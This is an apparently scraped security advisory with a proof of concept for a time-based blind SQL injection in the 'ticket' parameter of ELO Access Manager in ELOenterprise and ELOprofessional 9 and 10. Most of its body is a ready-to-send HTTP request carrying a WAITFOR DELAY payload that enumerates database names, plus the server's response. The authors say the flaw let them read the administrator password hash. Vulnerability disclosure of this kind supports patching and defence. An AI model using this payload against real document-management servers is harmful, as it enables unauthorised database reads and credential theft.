57 lines
No EOL
2.4 KiB
Text
57 lines
No EOL
2.4 KiB
Text
# Title: Elektronischer Leitz-Ordner 10 - SQL Injection
|
|
# Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
|
|
# Software: https://www.elo.com/en-de/
|
|
# CVE: N/A
|
|
# Affected Products:
|
|
# ELOenterprise 10 (ELO Access Manager <= 10.17.120)
|
|
# ELOenterprise 9 (ELO Access Manager <= 9.17.120)
|
|
# ELOprofessional 10 (ELO Access Manager <= 10.17.120)
|
|
# ELOprofessional 9 (ELO Access Manager <= 9.17.120)
|
|
|
|
|
|
|
|
# Description:
|
|
# ELO is a commercial software product for managing documents and
|
|
# electronic content. Storage and organization is similar to classic
|
|
# paper-based document management. ELO belongs to the category of document
|
|
# management (DMS) and enterprise content management systems (ECM). DMS
|
|
# and ECM systems enable audit-proof archiving of documents and
|
|
# information requiring storage.
|
|
|
|
# We have discovered a time-based blind SQL injection vulnerability in the
|
|
# ELO Access Manager (<= 9.17.120 and <= 10.17.120) component that makes
|
|
# it possible to read all database content. The vulnerability exists in
|
|
# the HTTP GET parameter "ticket". For example, we succeeded in reading
|
|
# the password hash of the administrator user in the "userdata" table from
|
|
# the "eloam" database.
|
|
|
|
# Proof of Concept:
|
|
|
|
GET
|
|
/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
|
|
IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
|
|
NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
|
|
(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
|
|
name),5,1))>104) WAITFOR DELAY '0:0:1'--
|
|
qvAV&after=1523013041889&lang=de&_dc=1523013101769 HTTP/1.1
|
|
Accept-Encoding: gzip,deflate
|
|
Connection: close
|
|
Accept: */*
|
|
Host: server:9090
|
|
Referer: http://server:9090/wf-NAME/social/api/feed/aggregation/201803310000
|
|
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv: 59.0) Gecko/20100101
|
|
Firefox/59.0
|
|
|
|
HTTP/1.1 401 Unauthorized
|
|
Server: Apache-Coyote/1.1
|
|
Content-Type: application/json;charset=UTF-8
|
|
Content-Length: 410
|
|
Date: Fri, 06 Apr 2018 11:57:15 GMT
|
|
Connection: close
|
|
|
|
{"error":{"code":401,"message":"[TICKET:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\u0027
|
|
IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
|
|
NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
|
|
(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
|
|
name),5,1))\u003e104) WAITFOR DELAY \u00270][ELOIX:2001]Sitzungskennung
|
|
ung..ltig oder abgelaufen. Melden Sie sich neu an.[NO-DETAILS]"}} |